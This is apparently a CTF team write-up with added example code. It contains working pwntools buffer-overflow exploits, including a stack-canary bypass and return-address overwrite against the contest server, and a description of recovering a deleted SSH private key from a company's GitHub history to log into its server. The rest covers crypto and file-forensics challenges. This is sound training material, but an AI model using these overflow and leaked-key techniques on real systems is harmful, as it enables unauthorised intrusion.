Despite entering as a team of 4, the CTF was just completed by myself and my good friend featherbear! We managed to claim first place, being ahead of second place by 20 points.
Check out his writeup here <3
These challenges were done by examining the disassembly using Binary Ninja.
Key observations:
- `gets` is used - possible overflow vulnerability
- to take the winning branch, the value at [ebp-0xc] must equal 0x37333331
- buffer starts being written at [ebp-0x20]
Overview:
- pad the payload from the buffer start at [ebp-0x20] up to [ebp-0xc] (0x20 - 0xc = 20 bytes), then write 0x37333331 so it lands at [ebp-0xc]
Code:
from pwn import *
p = remote('pwn.ctf.unswsecurity.com', 7004)
payload = b''
# pad until check location
payload += b'A' * (0x20-0xC)
# insert required value
payload += p32(0x37333331)
p.sendline(payload)
p.interactive()
Key observations:
- 1337 % 256 = 57 -> `exit` must be given 57 as its argument
- `gets` is used in `vuln` - possible overflow vulnerability
- buffer starts being written at [ebp-0x26]
Overview:
- pad the payload until the return address location at [ebp+4]
- overwrite the return address with the address where `exit` is called
- append the required value straight after it: once `ret` has popped the return address, that dword is at the top of the stack, which is exactly where the `call exit` at that address expects its argument
Code:
from pwn import *
p = remote('pwn.ctf.unswsecurity.com', 7006)
payload = b''
# pad until the return address
payload += b'A' * (0x26+0x4)
# overwrite return address with address when
# exit is called
payload += p32(0x8049219)
# set the required argument value
payload += p32(57)
p.sendline(payload)
p.interactive()
Key observations:
- `gets` is used in `lol` - possible overflow vulnerability
- buffer starts being written at [ebp-0x20]
- canary check occurs with a value at [ebp-0xc]
- canary value is printed out
- `win` function is provided
Overview:
- obtain the given canary value from the program output
- pad the payload until the canary location at [ebp-0xc]
- rewrite the canary with the leaked value so the check still passes
- pad the rest of the payload (from [ebp-0x8] up to the return address at [ebp+4], 0xc bytes)
- overwrite the return address with the address of the `win` function
Code:
from pwn import *
p = remote('pwn.ctf.unswsecurity.com', 7005)
# obtain the canary value
p.recvuntil('hi\n')
canary = p.recvuntil('\n', drop=True)
canary = b'0x' + canary
canary = int(canary, 16)
payload = b''
# pad until the canary
payload += b'A' * (0x20-0xC)
# overwrite the canary
payload += p32(canary)
# pad till the return address
payload += b'A' * 0xC
# overwrite return address
payload += p32(0x80491c6)
p.sendline(payload)
p.interactive()
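The three pwn scripts above all do the same thing: pad from the buffer start to an ebp-relative target, drop a 32-bit value there, repeat. The following is an added example, not the original write-up's code, that builds the same three payloads from those offsets with a reusable helper, checks the layout before anything is sent, and parses the canary from a constructed sample of the `hi` line (no connection is made, and `p32` is reimplemented with `struct` so the script runs without pwntools). Offsets and addresses are the ones stated in the challenges above; the sample output is made up.

```python
import struct


def p32(value):
    """Little-endian 32-bit pack, the same encoding pwntools' p32 uses on i386."""
    return struct.pack('<I', value)


def build_payload(buf_off, writes, filler=b'A'):
    """Lay out a gets() overflow payload from ebp-relative offsets.

    buf_off: offset of the buffer start relative to ebp (e.g. -0x20).
    writes:  list of (offset relative to ebp, bytes) pairs; the return
             address is at +4, a local at [ebp-0xc] is written as -0xc.
    Gaps between writes are filled with `filler`.
    """
    payload = b''
    cursor = buf_off
    for off, data in sorted(writes):
        if off < cursor:
            raise ValueError(f'write at ebp{off:+#x} overlaps data ending at ebp{cursor:+#x}')
        payload += filler * (off - cursor) + data
        cursor = off + len(data)
    # gets() stops reading at the first newline, so a 0x0a byte anywhere in
    # the payload (an address or value containing it) would truncate it silently.
    if b'\n' in payload:
        raise ValueError('payload contains 0x0a, which gets() treats as end of input')
    return payload


def dword_at(payload, buf_off, off):
    """Read back the 32-bit value the payload places at [ebp+off] (sanity check before sending)."""
    i = off - buf_off
    return struct.unpack('<I', payload[i:i + 4])[0]


def parse_canary(output):
    """Extract the canary printed on the line after 'hi'.

    `output` is everything received from the service so far. The value is
    printed as bare hex digits, which is why the original script prepends
    '0x' before calling int(); int(..., 16) accepts either form.
    """
    after = output.split(b'hi\n', 1)[1]
    hexdigits = after.split(b'\n', 1)[0].decode()
    return int(hexdigits, 16)


def challenge1_payload():
    # buffer at [ebp-0x20], winning value must sit at [ebp-0xc]
    return build_payload(-0x20, [(-0xc, p32(0x37333331))])


def challenge2_payload():
    # Return into the call to exit; the dword after the return address is at
    # the top of the stack after ret, which is where that call's argument lives.
    return build_payload(-0x26, [(4, p32(0x8049219) + p32(1337 % 256))])


def challenge3_payload(leaked_output):
    # Re-write the leaked canary at [ebp-0xc], then point the return address at win.
    canary = parse_canary(leaked_output)
    return build_payload(-0x20, [(-0xc, p32(canary)), (4, p32(0x80491c6))])


if __name__ == '__main__':
    # Constructed sample of what the canary challenge prints (not real service output).
    sample = b'welcome\nhi\ndeadbeef\n'
    for name, payload in [('1', challenge1_payload()),
                          ('2', challenge2_payload()),
                          ('3', challenge3_payload(sample))]:
        print(name, len(payload), payload.hex())
```

`dword_at` is the check worth running before `sendline`: if the value read back at `+4` is not the address you meant, the padding arithmetic is off by a few bytes and the process will just crash.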
Key observations:
- location was at 33-39 Hunter St
- clue was Frankie the Fox
Overview:
- Frankie's Pizza is on Hunter St
Key observations:
- required: twitter
- team page has a commented section about a guy named Robert Northcote
- robots.txt file had a path...
Overview:
- the path from robots.txt led to Rob's 'personal' page
- a link to his Twitter was there
Key observations:
- required: github
- no other links on the website
- names of staff are on the team page
Overview:
- search GitHub for the staff names
- Charlie Warner, CEO of Dorf, can be found, alongside his username
Key observations:
- CEO has starred a repo from the fired employee
- repo contains dorf site files
Overview:
- check previous commits
- config file was once pushed and then removed - bf99018
- private key was also once pushed and then removed - 5e702ce
- ssh into the server with that key to obtain the flag
Key observations:
- anagram
Overview:
- used an anagram solver
Key observations:
- possible Caesar cipher?
Overview:
- it was not a Caesar cipher
- used a Vigenère decoder in known-plaintext mode, supplying a word known to be in the plaintext
- found possible solutions - guess and check
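What the "known plaintext word" setting of a Vigenère decoder does is derive the key from the crib: each crib letter, lined up against a ciphertext position, fixes one slot of the repeating key. The following is an added example (not the write-up's tool) that rules out a Caesar shift, then enumerates every (position, key period, key) consistent with a crib and decrypts with each, leaving the guess-and-check to the reader. The plaintext and key in the test are constructed; the challenge's own ciphertext is not on the page.

```python
import string

ALPHA = string.ascii_uppercase


def clean(text):
    """Keep only letters, upper-cased, as classical-cipher tools do."""
    return ''.join(ch for ch in text.upper() if ch in ALPHA)


def shift_char(ch, k):
    return ALPHA[(ALPHA.index(ch) + k) % 26]


def caesar_candidates(ciphertext):
    """All 26 shifts; a Caesar cipher is a Vigenère with a one-letter key."""
    ct = clean(ciphertext)
    return [''.join(shift_char(c, -k) for c in ct) for k in range(26)]


def vigenere(text, key, decrypt=False):
    """Standard Vigenère: letter i is shifted by key[i mod len(key)]."""
    text, key = clean(text), clean(key)
    out = []
    for i, ch in enumerate(text):
        k = ALPHA.index(key[i % len(key)])
        out.append(shift_char(ch, -k if decrypt else k))
    return ''.join(out)


def key_from_crib(ct, crib, pos, period):
    """Key of length `period` implied by plaintext `crib` sitting at `pos`.

    Crib letter i fixes key slot (pos + i) mod period. Returns None if two
    crib letters disagree about a slot (this alignment/period is impossible)
    or if the crib is too short to fix every slot (key only partly known).
    """
    key = [None] * period
    for i, (c, p) in enumerate(zip(ct[pos:pos + len(crib)], crib)):
        k = (ALPHA.index(c) - ALPHA.index(p)) % 26
        slot = (pos + i) % period
        if key[slot] is not None and key[slot] != k:
            return None
        key[slot] = k
    if None in key:
        return None
    return ''.join(ALPHA[k] for k in key)


def crib_candidates(ciphertext, crib, max_period=None):
    """Every (pos, period, key, plaintext) consistent with `crib` in the plaintext.

    Tries each alignment of the crib and each period up to len(crib); a longer
    crib would be needed to pin down a longer key. Period 1 candidates are
    Caesar shifts, so if none appear the "is it Caesar?" question is answered too.
    """
    ct, crib = clean(ciphertext), clean(crib)
    max_period = max_period or len(crib)
    found = []
    for period in range(1, max_period + 1):
        for pos in range(len(ct) - len(crib) + 1):
            key = key_from_crib(ct, crib, pos, period)
            if key is not None:
                found.append((pos, period, key, vigenere(ct, key, decrypt=True)))
    return found


if __name__ == '__main__':
    # Constructed sample: not the challenge ciphertext.
    ct = vigenere('THEFLAGISHIDDENHERE', 'KEY')
    for pos, period, key, pt in crib_candidates(ct, 'FLAG'):
        print(f'pos={pos} period={period} key={key} -> {pt}')
```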
An online hex editor was used to modify the given png file.
Key observations:
- first four bytes of the header are overwritten
Overview:
- change the first four bytes to 89 50 4E 47, which are the first bytes of the PNG signature (the full 8-byte signature is 89 50 4E 47 0D 0A 1A 0A; only the first four were damaged here) - save the file and it should now open
Key observations:
- what?
Overview:
- `file` was used to determine the correct file type from the magic bytes rather than the extension
- a.notazip was opened as a zip
- a.png was opened as a pdf
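Both of the last two challenges come down to the leading bytes of a file: the PNG one needed them rewritten, the `file` one needed them read. The following is an added example, not part of the write-up, that identifies a file by magic bytes the way `file` does, rewrites a PNG signature, and refuses to do so unless the IHDR chunk behind it still has a valid CRC (so a non-PNG is not silently stamped with a PNG header). The tiny PNG it operates on is constructed in the script; nothing here is the challenge's actual file.

```python
import struct
import zlib

PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'  # 89 50 4E 47 0D 0A 1A 0A

# Longest signatures first so the 8-byte PNG one wins over shorter prefixes.
MAGIC = [
    (PNG_SIGNATURE, 'png'),
    (b'%PDF-', 'pdf'),
    (b'PK\x03\x04', 'zip'),
    (b'PK\x05\x06', 'zip (empty archive)'),
]


def sniff(data):
    """Identify a file by its leading bytes, as file(1) does, ignoring the extension."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return 'unknown'


def png_chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xffffffff
    return struct.pack('>I', len(payload)) + ctype + payload + struct.pack('>I', crc)


def make_png(width, height):
    """Build a small valid 8-bit RGB PNG (solid red) as constructed test input."""
    ihdr_data = struct.pack('>IIBBBBB', width, height, 8, 2, 0, 0, 0)
    scanlines = b''.join(b'\x00' + b'\xff\x00\x00' * width for _ in range(height))
    return (PNG_SIGNATURE + png_chunk(b'IHDR', ihdr_data)
            + png_chunk(b'IDAT', zlib.compress(scanlines)) + png_chunk(b'IEND', b''))


def ihdr(data):
    """Return (width, height) from the IHDR chunk, verifying its CRC on the way."""
    if len(data) < 8 + 4 + 4 + 13 + 4:
        raise ValueError('too short to hold a signature and an IHDR chunk')
    length, ctype = struct.unpack('>I4s', data[8:16])
    if ctype != b'IHDR' or length != 13:
        raise ValueError('first chunk is not a 13-byte IHDR')
    body = data[16:16 + length]
    crc, = struct.unpack('>I', data[16 + length:20 + length])
    if zlib.crc32(ctype + body) & 0xffffffff != crc:
        raise ValueError('IHDR CRC mismatch: the chunk data is damaged too')
    width, height = struct.unpack('>II', body[:8])
    return width, height


def repair_png_signature(data):
    """Rewrite the 8-byte signature when only the header was clobbered.

    The challenge file had its first four bytes overwritten; writing the
    whole signature covers that case and the case where all eight are gone.
    The IHDR CRC check is what makes this safe to run on an unknown file.
    """
    fixed = PNG_SIGNATURE + data[8:]
    ihdr(fixed)  # raises if the rest of the header is not intact
    return fixed


if __name__ == '__main__':
    good = make_png(3, 2)
    broken = b'\x00\x00\x00\x00' + good[4:]  # constructed: first four bytes zeroed
    print(sniff(broken), '->', sniff(repair_png_signature(broken)), ihdr(good))
```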
Key observations:
- hint led me to an online steganography decoder
- challenge description seemed to be a pangram
Overview:
- used the decoder to find the required string
- the pangram was used to solve the substitution cipher: a pangram contains every letter, so its ciphertext gives the full mapping
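The reason a pangram solves a monoalphabetic substitution outright is that the plaintext/ciphertext pair fixes every letter of the table. The following is an added example, not the write-up's solver, that derives the cipher-to-plain mapping from such a pair, checks that the pair is actually a consistent bijective substitution, reports which letters are still unknown when the known text is not a pangram, and decrypts a second message with the result. The key and messages are constructed; the challenge text is not on the page.

```python
import string

ALPHA = string.ascii_uppercase
PANGRAM = 'THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG'


def substitute(text, key):
    """Monoalphabetic substitution: plaintext letter ALPHA[i] -> key[i]; other characters pass through."""
    if sorted(key) != list(ALPHA):
        raise ValueError('key must be a permutation of the 26 letters')
    return text.upper().translate(str.maketrans(ALPHA, key))


def mapping_from_pair(plain, cipher):
    """Derive the cipher->plain letter mapping from a known plaintext/ciphertext pair.

    A pangram pins down all 26 entries; shorter known text gives a partial
    table. Raises if the pair cannot be a substitution cipher (one cipher
    letter standing for two plain letters, or two cipher letters for one).
    """
    if len(plain) != len(cipher):
        raise ValueError('plaintext and ciphertext lengths differ')
    mapping = {}
    for p, c in zip(plain.upper(), cipher.upper()):
        if p not in ALPHA:
            continue  # spaces/punctuation are not enciphered
        if mapping.get(c, p) != p:
            raise ValueError(f'ciphertext {c} maps to both {mapping[c]} and {p}')
        mapping[c] = p
    if len(set(mapping.values())) != len(mapping):
        raise ValueError('two ciphertext letters decode to the same plaintext letter')
    return mapping


def missing_letters(mapping):
    """Plaintext letters the known text did not cover (empty for a true pangram)."""
    return sorted(set(ALPHA) - set(mapping.values()))


def decrypt(ciphertext, mapping, unknown='?'):
    """Apply the mapping; letters not yet recovered are shown as `unknown`."""
    return ''.join(mapping.get(ch, unknown) if ch in ALPHA else ch
                   for ch in ciphertext.upper())


if __name__ == '__main__':
    key = 'QWERTYUIOPASDFGHJKLZXCVBNM'  # constructed key, a permutation of the alphabet
    table = mapping_from_pair(PANGRAM, substitute(PANGRAM, key))
    print('missing:', missing_letters(table))
    print(decrypt(substitute('FLAG IS HIDDEN IN THE IMAGE', key), table))
```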